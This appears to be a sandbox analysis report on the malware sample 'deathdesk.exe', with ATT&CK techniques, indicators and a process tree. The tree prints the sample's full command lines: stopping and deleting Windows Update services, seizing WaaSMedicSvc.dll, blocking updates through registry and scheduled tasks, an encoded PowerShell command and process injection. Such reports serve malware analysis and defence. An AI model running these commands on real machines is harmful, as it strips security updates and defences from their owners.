hxxps://github[.]com/kazareworking/public_deathdesk/blob/main/deathdesk[.]exe

General

Target

https://github.com/kazareworking/public_deathdesk/blob/main/deathdesk.exe

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

deathdesk.exe

pid process

3488 deathdesk.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

2688 takeown.exe
2776 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
3488	deathdesk.exe

pid	process
2688	takeown.exe
2776	icacls.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

deathdesk.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation	deathdesk.exe

Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

2688 takeown.exe
2776 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

77 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

deathdesk.exe

description pid process target process

PID 3488 set thread context of 4144 3488 deathdesk.exe conhost.exe

pid	process
2688	takeown.exe
2776	icacls.exe

flow	ioc
77	ip-api.com

description	pid	process	target process
PID 3488 set thread context of 4144	3488	deathdesk.exe	conhost.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1844 sc.exe
1836 sc.exe
776 sc.exe
3364 sc.exe
4116 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1844	sc.exe
1836	sc.exe
776	sc.exe
3364	sc.exe
4116	sc.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = e8baa059b9aed801	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 41 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2"	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c09384d93fded801	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\RepId	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30989887"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30989887"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30989887"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{5AB820DC-EE46-47F2-BB7A-A2B25B7C07FC}"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3472158695"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b1421600000000020000000000106600000001000020000000611d92d451d6e8b5b51632cdce197f97d5f56ea07acea1f641021ed264d6cd02000000000e8000000002000020000000ba5b9ee286340683211dec60424d55c72286afadfd6107cb47502d77eacc66f3200000004d8846265b7469f9f1e44c01d83073e189d79fa98402f3b9e2f39aefa25f4fc840000000d68df10987cbe860f31193839fd260748648fe9be6c03a85772df124ca129bc81068cae97e8270640b949f4540837bd26a37a6c0b39e835c9953c86a8b8f1d30	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\IESettingSync	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f08071d93fded801	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e2728ad8693e804caf0ad2c227b142160000000002000000000010660000000100002000000037865dc314a327b9bc97969f06de66104aa18c1d17af6187b2b03b5a5685b348000000000e80000000020000200000006c3048b5d1318db13383af59f6213103f6e376b928181323581e71d698e111002000000022854d4cc893cc7aab75eb609028d158c4e6280db13ff0c446db7f0fa4d4259940000000b0d920dbd6ea512f53bba7ee95b17c392641211a9e0cdfacf7bec453cf94059f3ef80a966d474a98a61745508f907dbc7ad880681cb33250e2c965d832ef80ec	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3482941728"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "372346808"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{FA62DDCF-4A32-11ED-B696-E23A5D90AA50} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\VersionManager	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3472158695"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Internet Explorer\VersionManager	IEXPLORE.EXE

Modifies data under HKEY_USERS 9 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE

Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

4140 reg.exe
4632 reg.exe
1196 reg.exe
5056 reg.exe
3712 reg.exe
4832 reg.exe
2280 reg.exe
228 reg.exe
1800 reg.exe

pid	process
4140	reg.exe
4632	reg.exe
1196	reg.exe
5056	reg.exe
3712	reg.exe
4832	reg.exe
2280	reg.exe
228	reg.exe
1800	reg.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exedeathdesk.exepowershell.exepowershell.EXE

pid	process
4836	powershell.exe
4836	powershell.exe
4836	powershell.exe
3488	deathdesk.exe
5096	powershell.exe
5096	powershell.exe
1784	powershell.EXE
1784	powershell.EXE

Suspicious use of AdjustPrivilegeToken 13 IoCs

Processes:

powershell.exedeathdesk.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exepowershell.EXE

description	pid	process
Token: SeDebugPrivilege	4836	powershell.exe
Token: SeDebugPrivilege	3488	deathdesk.exe
Token: SeShutdownPrivilege	1888	powercfg.exe
Token: SeCreatePagefilePrivilege	1888	powercfg.exe
Token: SeShutdownPrivilege	1636	powercfg.exe
Token: SeCreatePagefilePrivilege	1636	powercfg.exe
Token: SeShutdownPrivilege	4052	powercfg.exe
Token: SeCreatePagefilePrivilege	4052	powercfg.exe
Token: SeShutdownPrivilege	4300	powercfg.exe
Token: SeCreatePagefilePrivilege	4300	powercfg.exe
Token: SeTakeOwnershipPrivilege	2688	takeown.exe
Token: SeDebugPrivilege	5096	powershell.exe
Token: SeDebugPrivilege	1784	powershell.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

iexplore.exe

pid process

2608 iexplore.exe
2608 iexplore.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

2608 iexplore.exe
2608 iexplore.exe
4904 IEXPLORE.EXE
4904 IEXPLORE.EXE
4904 IEXPLORE.EXE
4904 IEXPLORE.EXE

pid	process
2608	iexplore.exe
2608	iexplore.exe

pid	process
2608	iexplore.exe
2608	iexplore.exe
4904	IEXPLORE.EXE
4904	IEXPLORE.EXE
4904	IEXPLORE.EXE
4904	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 56 IoCs

Processes:

iexplore.exedeathdesk.execmd.execmd.exe

description	pid	process	target process
PID 2608 wrote to memory of 4904	2608	iexplore.exe	IEXPLORE.EXE
PID 2608 wrote to memory of 4904	2608	iexplore.exe	IEXPLORE.EXE
PID 2608 wrote to memory of 4904	2608	iexplore.exe	IEXPLORE.EXE
PID 2608 wrote to memory of 3488	2608	iexplore.exe	deathdesk.exe
PID 2608 wrote to memory of 3488	2608	iexplore.exe	deathdesk.exe
PID 3488 wrote to memory of 4836	3488	deathdesk.exe	powershell.exe
PID 3488 wrote to memory of 4836	3488	deathdesk.exe	powershell.exe
PID 3488 wrote to memory of 4040	3488	deathdesk.exe	cmd.exe
PID 3488 wrote to memory of 4040	3488	deathdesk.exe	cmd.exe
PID 3488 wrote to memory of 1332	3488	deathdesk.exe	cmd.exe
PID 3488 wrote to memory of 1332	3488	deathdesk.exe	cmd.exe
PID 4040 wrote to memory of 4116	4040	cmd.exe	sc.exe
PID 4040 wrote to memory of 4116	4040	cmd.exe	sc.exe
PID 1332 wrote to memory of 1888	1332	cmd.exe	powercfg.exe
PID 1332 wrote to memory of 1888	1332	cmd.exe	powercfg.exe
PID 4040 wrote to memory of 1844	4040	cmd.exe	sc.exe
PID 4040 wrote to memory of 1844	4040	cmd.exe	sc.exe
PID 1332 wrote to memory of 1636	1332	cmd.exe	powercfg.exe
PID 1332 wrote to memory of 1636	1332	cmd.exe	powercfg.exe
PID 4040 wrote to memory of 1836	4040	cmd.exe	sc.exe
PID 4040 wrote to memory of 1836	4040	cmd.exe	sc.exe
PID 1332 wrote to memory of 4052	1332	cmd.exe	powercfg.exe
PID 1332 wrote to memory of 4052	1332	cmd.exe	powercfg.exe
PID 4040 wrote to memory of 776	4040	cmd.exe	sc.exe
PID 4040 wrote to memory of 776	4040	cmd.exe	sc.exe
PID 1332 wrote to memory of 4300	1332	cmd.exe	powercfg.exe
PID 1332 wrote to memory of 4300	1332	cmd.exe	powercfg.exe
PID 4040 wrote to memory of 3364	4040	cmd.exe	sc.exe
PID 4040 wrote to memory of 3364	4040	cmd.exe	sc.exe
PID 4040 wrote to memory of 4140	4040	cmd.exe	reg.exe
PID 4040 wrote to memory of 4140	4040	cmd.exe	reg.exe
PID 4040 wrote to memory of 228	4040	cmd.exe	reg.exe
PID 4040 wrote to memory of 228	4040	cmd.exe	reg.exe
PID 4040 wrote to memory of 4632	4040	cmd.exe	reg.exe
PID 4040 wrote to memory of 4632	4040	cmd.exe	reg.exe
PID 4040 wrote to memory of 1196	4040	cmd.exe	reg.exe
PID 4040 wrote to memory of 1196	4040	cmd.exe	reg.exe
PID 4040 wrote to memory of 5056	4040	cmd.exe	reg.exe
PID 4040 wrote to memory of 5056	4040	cmd.exe	reg.exe
PID 4040 wrote to memory of 2688	4040	cmd.exe	takeown.exe
PID 4040 wrote to memory of 2688	4040	cmd.exe	takeown.exe
PID 4040 wrote to memory of 2776	4040	cmd.exe	icacls.exe
PID 4040 wrote to memory of 2776	4040	cmd.exe	icacls.exe
PID 3488 wrote to memory of 4144	3488	deathdesk.exe	conhost.exe
PID 3488 wrote to memory of 4144	3488	deathdesk.exe	conhost.exe
PID 3488 wrote to memory of 4144	3488	deathdesk.exe	conhost.exe
PID 3488 wrote to memory of 4144	3488	deathdesk.exe	conhost.exe
PID 3488 wrote to memory of 4144	3488	deathdesk.exe	conhost.exe
PID 3488 wrote to memory of 4144	3488	deathdesk.exe	conhost.exe
PID 3488 wrote to memory of 4144	3488	deathdesk.exe	conhost.exe
PID 3488 wrote to memory of 4144	3488	deathdesk.exe	conhost.exe
PID 3488 wrote to memory of 4144	3488	deathdesk.exe	conhost.exe
PID 3488 wrote to memory of 4144	3488	deathdesk.exe	conhost.exe
PID 3488 wrote to memory of 4144	3488	deathdesk.exe	conhost.exe
PID 3488 wrote to memory of 5096	3488	deathdesk.exe	powershell.exe
PID 3488 wrote to memory of 5096	3488	deathdesk.exe	powershell.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://github.com/kazareworking/public_deathdesk/blob/main/deathdesk.exe
1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2608

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2608 CREDAT:17410 /prefetch:2
2⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4904

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DUHIRKGY\deathdesk.exe
"C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DUHIRKGY\deathdesk.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAaQB4ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYgBjAG0AdQAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBpAGYAcAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB6AG8AawBwACMAPgA="
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4836

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
- Suspicious use of WriteProcessMemory
PID:4040

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:4116

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:1844

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:1836

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:776

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:3364

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:4140

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:228

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies security service
- Modifies registry key
PID:4632

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:1196

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:5056

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2688

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2776

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:3712

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4832

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2280

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1800

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:60

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:3844

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:2504

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:5044

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:4872

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:4452

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:4572

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
- Suspicious use of WriteProcessMemory
PID:1332

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1888

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1636

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4052

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4300

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
3⤵
- Drops file in Windows directory
PID:4144

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
